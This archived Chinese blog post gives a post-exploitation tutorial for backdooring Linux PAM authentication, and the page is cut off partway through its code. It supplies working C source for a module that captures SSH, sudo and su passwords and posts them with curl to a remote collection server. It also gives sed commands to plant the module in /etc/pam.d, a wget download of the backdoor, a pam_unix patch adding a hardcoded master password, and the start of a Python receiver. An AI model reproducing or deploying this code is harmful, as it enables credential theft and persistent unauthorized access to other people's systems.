<!DOCTYPE html>
<html lang>
  <head><meta name="generator" content="Hexo 3.9.0">
    
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,minimum-scale=1,maximum-scale=1">


<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



  <meta name="description" content="Linux 后渗透笔记 PAM后门">




  <meta name="keywords" content="PAM后门,pam_unix,Linux,后渗透,">





  <link rel="alternate" href="/atom.xml" title="Gorgias'Blog">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.1">



<link rel="canonical" href="https://gorgias.me/2018/03/25/Linux-后渗透笔记-PAM后门/">


<meta name="description" content="前言 Linux-PAM是可插入认证模块(Pluggable Authentication Modules)，PAM使用配置/etc/pam.d/下的文件，来管理对程序的认证方式。 根据/etc/pam.d/下的各种服务配置文件，调用/lib/security下相应的模块，以加载动态链接库的形式实现需要的认证方式。 后渗透阶段中，当拿到root权限，刚好管理员只用root账户，想获得管理员密码进">
<meta name="keywords" content="PAM后门,pam_unix,Linux,后渗透">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux 后渗透笔记 PAM后门">
<meta property="og:url" content="https://gorgias.me/2018/03/25/Linux-后渗透笔记-PAM后门/index.html">
<meta property="og:site_name" content="Gorgias&#39;Blog">
<meta property="og:description" content="前言 Linux-PAM是可插入认证模块(Pluggable Authentication Modules)，PAM使用配置/etc/pam.d/下的文件，来管理对程序的认证方式。 根据/etc/pam.d/下的各种服务配置文件，调用/lib/security下相应的模块，以加载动态链接库的形式实现需要的认证方式。 后渗透阶段中，当拿到root权限，刚好管理员只用root账户，想获得管理员密码进">
<meta property="og:locale" content="en-us">
<meta property="og:image" content="https://gorgias.me/2018/03/25/Linux-后渗透笔记-PAM后门/pam_tg.gif">
<meta property="og:updated_time" content="2020-07-28T10:40:21.615Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux 后渗透笔记 PAM后门">
<meta name="twitter:description" content="前言 Linux-PAM是可插入认证模块(Pluggable Authentication Modules)，PAM使用配置/etc/pam.d/下的文件，来管理对程序的认证方式。 根据/etc/pam.d/下的各种服务配置文件，调用/lib/security下相应的模块，以加载动态链接库的形式实现需要的认证方式。 后渗透阶段中，当拿到root权限，刚好管理员只用root账户，想获得管理员密码进">
<meta name="twitter:image" content="https://gorgias.me/2018/03/25/Linux-后渗透笔记-PAM后门/pam_tg.gif">


<link rel="stylesheet" type="text/css" href="/css/style.css?v=1.1">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">


  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css">




<script type="text/javascript">
  var themeConfig = {
    fancybox: {
      enable: true
    },
  };
</script>




  



    <title> Linux 后渗透笔记 PAM后门 - Gorgias'Blog </title>
  </head>

  <body>
    <div id="page">
      <header id="masthead"><div class="site-header-inner">
    <h1 class="site-title">
        <a href="/." class="logo">Gorgias'Blog</a>
    </h1>

    <nav id="nav-top">
        
            <ul id="menu-top" class="nav-top-items">
                
                    <li class="menu-item">
                        <a href="/archives">
                            
                            
                                Archives
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/about">
                            
                            
                                About
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/links">
                            
                            
                                Links
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/atom.xml">
                            
                            
                                RSS
                            
                        </a>
                    </li>
                
            </ul>
        
  </nav>
</div>

      </header>
      <div id="content">
        
    <div id="primary">
        
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          Linux 后渗透笔记 PAM后门
        
      </h1>

      <time class="post-time">
          Mar 25 2018
      </time>
    </header>



    
            <div class="post-content">
            <h2 id="前言"><a class="markdownIt-Anchor" href="#前言"></a> 前言</h2>
<p>Linux-PAM是可插入认证模块(Pluggable Authentication Modules)，PAM使用配置/etc/pam.d/下的文件，来管理对程序的认证方式。</p>
<p>根据/etc/pam.d/下的各种服务配置文件，调用/lib/security下相应的模块，以加载动态链接库的形式实现需要的认证方式。</p>
<p>后渗透阶段中，当拿到root权限，刚好管理员只用root账户，想获得管理员密码进行横向渗透时，可以利用PAM获取管理员的明文密码。</p>
<p><a href="https://github.com/gorgiaxx/sshLooter" target="_blank" rel="noopener">sshLooter</a>便是通过此方式获取管理员明文密码，但它基于python-pam，实战环境中python环境经常符合预期，而且直接硬编码telegram-bot的token，一旦泄露，可能会被骗入蜜罐，这个工具用起来非常鸡肋，因此有了下面的实践。</p>
<h2 id="编写后门认证模块"><a class="markdownIt-Anchor" href="#编写后门认证模块"></a> 编写后门认证模块</h2>
<p>首先查看系统和PAM版本，不同发行版的版本不同，不一定能通用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">getconf LONG_BIT</span><br><span class="line">cat /etc/redhat-release</span><br><span class="line">rpm -qa | grep pam</span><br><span class="line">apt-get list --installed | grep pam</span><br></pre></td></tr></table></figure>
<p>然后vi /etc/ssh/sshd_config，确保UsePAM启用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># Set this to &apos;yes&apos; to enable PAM authentication, account processing,</span><br><span class="line"># and session processing. If this is enabled, PAM authentication will</span><br><span class="line"># be allowed through the ChallengeResponseAuthentication mechanism.</span><br><span class="line"># Depending on your PAM configuration, this may bypass the setting of</span><br><span class="line"># PasswordAuthentication, PermitEmptyPasswords, and</span><br><span class="line"># &quot;PermitRootLogin without-password&quot;. If you just want the PAM account and</span><br><span class="line"># session checks to run without PAM authentication, then enable this but set</span><br><span class="line"># ChallengeResponseAuthentication=no</span><br><span class="line">#UsePAM no</span><br><span class="line">UsePAM yes</span><br></pre></td></tr></table></figure>
<p>目前我只在下面两个平台测试过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pam-0.99.6.2-6.el5_5.2  CentOS release 5.8</span><br><span class="line">pam-1.1.1-13.el6.x86_64 CentOS release 6.4</span><br></pre></td></tr></table></figure>
<p>在PAM源码中，pam_sm_authenticate函数对应认证服务，我们要在这里获得密码。<br>
下面是代码，保存为pam_authx.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PAM_SM_AUTH</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;security/pam_appl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;security/pam_modules.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;syslog.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdarg.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">void</span> _pam_log(<span class="keyword">int</span> err, <span class="keyword">const</span> <span class="keyword">char</span> *format, ...) &#123;</span><br><span class="line">    va_list args;</span><br><span class="line">    va_start(args, format);</span><br><span class="line">    <span class="comment">// openlog("pam_authx", LOG_CONS|LOG_PID, LOG_AUTH);</span></span><br><span class="line">    vsyslog(err, format, args);</span><br><span class="line">    va_end(args);</span><br><span class="line">    closelog();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">void</span> _write_log(<span class="keyword">char</span> *path, <span class="keyword">char</span> *content) &#123;</span><br><span class="line">    FILE *fp;</span><br><span class="line">    fp=fopen(path,<span class="string">"a"</span>);</span><br><span class="line">    <span class="built_in">fprintf</span>(fp,<span class="string">"%s\n"</span>, content);</span><br><span class="line">    fclose(fp);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">char</span> <span class="title">chr</span><span class="params">(<span class="keyword">int</span> value)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">char</span> result = <span class="string">'\0'</span>;</span><br><span class="line">    <span class="keyword">if</span>(value &gt;= <span class="number">0</span> &amp;&amp; value &lt;= <span class="number">9</span>) &#123;</span><br><span class="line">        result = (<span class="keyword">char</span>)(value + <span class="number">48</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span>(value &gt;= <span class="number">10</span> &amp;&amp; value &lt;= <span class="number">15</span>) &#123;</span><br><span class="line">        result = (<span class="keyword">char</span>)(value - <span class="number">10</span> + <span class="number">65</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        ;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">str_to_hex</span><span class="params">(<span class="keyword">char</span> *ch, <span class="keyword">char</span> *hex)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">int</span> high,low;</span><br><span class="line">    <span class="keyword">int</span> tmp = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span>(ch == <span class="literal">NULL</span> || hex == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">strlen</span>(ch) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-2</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span>(*ch) &#123;</span><br><span class="line">        tmp = (<span class="keyword">int</span>)*ch;</span><br><span class="line">        high = tmp &gt;&gt; <span class="number">4</span>;</span><br><span class="line">        low = tmp &amp; <span class="number">15</span>;</span><br><span class="line">        *hex++ = chr(high);</span><br><span class="line">        *hex++ = chr(low);</span><br><span class="line">        ch++;</span><br><span class="line">    &#125;</span><br><span class="line">    *hex = <span class="string">'\0'</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">pam_sm_authenticate</span><span class="params">(<span class="keyword">pam_handle_t</span> *pamh, <span class="keyword">int</span> flags, <span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">char</span> *username;</span><br><span class="line">    <span class="keyword">char</span> *password;</span><br><span class="line">    <span class="keyword">char</span> *remotehost;</span><br><span class="line">    pam_get_item(pamh, PAM_USER, (<span class="keyword">void</span>*) &amp;username);</span><br><span class="line">    pam_get_item(pamh, PAM_AUTHTOK, (<span class="keyword">void</span>*) &amp;password);</span><br><span class="line">    pam_get_item(pamh, PAM_RHOST, (<span class="keyword">void</span>*) &amp;remotehost);</span><br><span class="line">    <span class="keyword">if</span> (!username || !password) &#123;</span><br><span class="line">        <span class="keyword">return</span> PAM_AUTHINFO_UNAVAIL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 前提开启syslog，输出在debug，三种记录方式可选择注释</span></span><br><span class="line">    _pam_log(LOG_DEBUG, <span class="string">"ssh auth attempt: %s entered the password %s"</span>, username, password);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">char</span> cmd[<span class="number">300</span>];</span><br><span class="line">    <span class="keyword">char</span> password_hex[<span class="number">200</span>];</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 把密码转成HexString格式，因为有其他符号容易出bug</span></span><br><span class="line">    str_to_hex(password, password_hex);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 把密码输出至/tmp/6W1PUsEP7qUC.log，并且通过HTTP协议回源到我的服务器</span></span><br><span class="line">    <span class="built_in">strcpy</span>(cmd, <span class="string">"curl -d 'msg="</span>);</span><br><span class="line">    <span class="built_in">strcat</span>(cmd, username);</span><br><span class="line">    <span class="built_in">strcat</span>(cmd, <span class="string">"::"</span>);</span><br><span class="line">    <span class="built_in">strcat</span>(cmd, password_hex);</span><br><span class="line">    _write_log(<span class="string">"/tmp/6W1PUsEP7qUC.log"</span>, cmd);</span><br><span class="line">    <span class="built_in">strcat</span>(cmd, <span class="string">"::"</span>);</span><br><span class="line">    <span class="built_in">strcat</span>(cmd, remotehost);</span><br><span class="line">    <span class="built_in">strcat</span>(cmd, <span class="string">"' 'http://target:8443/ssh'"</span>);</span><br><span class="line">    system(cmd);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span>(PAM_SUCCESS);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">pam_sm_setcred</span><span class="params">(<span class="keyword">pam_handle_t</span> *pamh, <span class="keyword">int</span> flags, <span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span>(PAM_IGNORE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>使用gcc直接编译成动态链接库文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -fPIC -DPIC -shared -rdynamic -o pam_authx.so pam_authx.c</span><br></pre></td></tr></table></figure>
<h2 id="配置pam后门"><a class="markdownIt-Anchor" href="#配置pam后门"></a> 配置PAM后门</h2>
<p>根据官方说明，为了获取密码，我们要设置成auth模块类型</p>
<blockquote>
<p>auth -<br>
this module type provides two aspects of authenticating the user. Firstly, it establishes that the user is who they claim to be, by instructing the application to prompt the user for a password or other means of identification. Secondly, the module can grant group membership or other privileges through its credential granting properties.</p>
</blockquote>
<p>就算失败也继续执行其他模块</p>
<blockquote>
<p>required -<br>
failure of such a PAM will ultimately lead to the PAM-API returning failure but only after the remaining stacked modules (for this service and type) have been invoked.</p>
</blockquote>
<p>因为上面的代码只是针对pam_sm_authenticate函数的，为了快速编译而写的，所以还是需要用到pam_unix.so模块，它会把密码与/etc/shadow中的哈希对比。<br>
接下来在/etc/pam.d/的对应配置文件首行加入下面两条配置，根据官方说明，按顺序就行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Ubuntu</span></span><br><span class="line">/etc/pam.d/common-auth-ys</span><br><span class="line"><span class="comment"># CentOS</span></span><br><span class="line">/etc/pam.d/sshd</span><br></pre></td></tr></table></figure>
<blockquote>
<p>An important feature of PAM, is that a number of rules may be stacked to combine the services of a number of PAMs for a given authentication task.</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">auth       required     pam_unix.so</span><br><span class="line">auth       required     pam_authx.so</span><br></pre></td></tr></table></figure>
<p>这里可以对sshd, sudo, su, passwd等服务加入后门模块，当然后者属于低权限用户，可以使用trace跟踪输入的密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sed -i <span class="string">"1iauth       required     pam_unix.so\nauth       required     pam_authx.so"</span> /etc/pam.d/sshd</span><br><span class="line">sed -i <span class="string">"1iauth       required     pam_unix.so\nauth       required     pam_authx.so"</span> /etc/pam.d/sudo</span><br><span class="line">sed -i <span class="string">"1iauth       required     pam_unix.so\nauth       required     pam_authx.so"</span> /etc/pam.d/su</span><br><span class="line">sed -i <span class="string">"1iauth       required     pam_unix.so\nauth       required     pam_authx.so"</span> /etc/pam.d/passwd</span><br></pre></td></tr></table></figure>
<p>下载目标编辑好的pam后门到目标电脑</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># CentOS</span></span><br><span class="line">wget http://target:8443/download/authx -O /lib64/security/pam_authx.so</span><br><span class="line"><span class="comment"># Ubuntu</span></span><br><span class="line">wget http://target:8443/download/authx -O /lib/x86_64-linux-gnu/security/pam_authx.so</span><br><span class="line"></span><br><span class="line">chmod a+x /lib64/security/pam_authx.so</span><br></pre></td></tr></table></figure>
<h2 id="在pam认证模块源码添加后门"><a class="markdownIt-Anchor" href="#在pam认证模块源码添加后门"></a> 在PAM认证模块源码添加后门</h2>
<p>如果模块无效，可以使用此方法，先查看日志</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tail /var/<span class="built_in">log</span>/secure</span><br></pre></td></tr></table></figure>
<p>如果因为版本兼容性原因，可以去这个地址下载对应版本的PAM</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.linux-pam.org/library/</span><br></pre></td></tr></table></figure>
<p>下载完毕解压并编辑pam_unix_auth.c</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tar -zxvf Linux-PAM-1.1.1.tar.gz</span><br><span class="line"><span class="built_in">cd</span> Linux-PAM-1.1.1</span><br><span class="line">vim modules/pam_unix/pam_unix_auth.c</span><br></pre></td></tr></table></figure>
<p>对pam_sm_authenticate函数进行修改，编译，然后直接替换64位目标机器的/lib64/security/pam_authx.so</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">PAM_EXTERN <span class="keyword">int</span> <span class="title">pam_sm_authenticate</span><span class="params">(<span class="keyword">pam_handle_t</span> * pamh, <span class="keyword">int</span> flags ,<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span> ctrl;</span><br><span class="line">    <span class="keyword">int</span> retval, *ret_data = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">const</span> <span class="keyword">char</span> *name;</span><br><span class="line">    <span class="keyword">const</span> <span class="keyword">void</span> *p;</span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* verify the password of this user */</span></span><br><span class="line">    retval = _unix_verify_password(pamh, name, p, ctrl);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ------------- 在此处添加代码 -----------------</span></span><br><span class="line">    <span class="comment">// 加入指定密码后门，如果输入buyaoluwo，也能登录成功</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">strcmp</span>(p,<span class="string">"buyaoluwo"</span>)==<span class="number">0</span>) &#123;</span><br><span class="line">        retval = PAM_SUCCESS;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(retval== PAM_SUCCESS) &#123;</span><br><span class="line">        <span class="comment">// 当密码正确，这里可以添加输出密码的代码。</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ------------- 在此处添加代码 -----------------</span></span><br><span class="line"></span><br><span class="line">    name = p = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    AUTH_RETURN;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="接收端"><a class="markdownIt-Anchor" href="#接收端"></a> 接收端</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> StringIO</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">WSGIServer</span><span class="params">(object)</span>:</span></span><br><span class="line"></span><br><span class="line">    address_family = socket.AF_INET</span><br><span class="line">    socket_type = socket.SOCK_STREAM</span><br><span class="line">    request_queue_size = <span class="number">1</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, server_address)</span>:</span></span><br><span class="line">        <span class="comment"># Create a listening socket</span></span><br><span class="line">        self.listen_socket = listen_socket = socket.socket(</span><br><span class="line">            self.address_family,</span><br><span class="line">            self.socket_type</span><br><span class="line">        )</span><br><span class="line">        <span class="comment"># Allow to reuse the same address</span></span><br><span class="line">        listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</span><br><span class="line">        <span class="comment"># Bind</span></span><br><span class="line">        listen_socket.bind(server_address)</span><br><span class="line">        <span class="comment"># Activate</span></span><br><span class="line">        listen_socket.listen(self.request_queue_size)</span><br><span class="line">        <span class="comment"># Get server host name and port</span></span><br><span class="line">        host, port = self.listen_socket.getsockname()[:<span class="number">2</span>]</span><br><span class="line">        self.server_name = socket.getfqdn(host)</span><br><span class="line">        self.server_port = port</span><br><span class="line">        <span class="comment"># Return headers set by Web framework/Web application</span></span><br><span class="line">        self.headers_set = []</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">set_app</span><span class="params">(self, application)</span>:</span></span><br><span class="line">        self.application = application</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">serve_forever</span><span class="params">(self)</span>:</span></span><br><span class="line">        listen_socket = self.listen_socket</span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            <span class="comment"># New client connection</span></span><br><span class="line">            self.client_connection, client_address = listen_socket.accept()</span><br><span class="line">            <span class="comment"># Handle one request and close the client connection. Then</span></span><br><span class="line">            <span class="comment"># loop over to wait for another client connection</span></span><br><span class="line">            self.handle_one_request()</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">handle_one_request</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.request_data = request_data = self.client_connection.recv(<span class="number">1024</span>)</span><br><span class="line">        <span class="comment"># Print formatted request data a la 'curl -v'</span></span><br><span class="line">        print(<span class="string">''</span>.join(</span><br><span class="line">            <span class="string">'&lt; &#123;line&#125;\n'</span>.format(line=line)</span><br><span class="line">            <span class="keyword">for</span> line <span class="keyword">in</span> request_data.splitlines()</span><br><span class="line">        ))</span><br><span class="line"></span><br><span class="line">        self.parse_request(request_data)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Construct environment dictionary using request data</span></span><br><span class="line">        env = self.get_environ()</span><br><span class="line"></span><br><span class="line">        <span class="comment"># It's time to call our application callable and get</span></span><br><span class="line">        <span class="comment"># back a result that will become HTTP response body</span></span><br><span class="line">        result = self.application(env, self.start_response)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Construct a response and send it back to the client</span></span><br><span class="line">        self.finish_response(result)</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">parse_request</span><span class="params">(self, text)</span>:</span></span><br><span class="line">        request_line = text.splitlines()[<span class="number">0</span>]</span><br><span class="line">        request_line = request_line.rstrip(<span class="string">'\r\n'</span>)</span><br><span class="line">        <span class="comment"># Break down the request line into components</span></span><br><span class="line">        (self.request_method,  <span class="comment"># 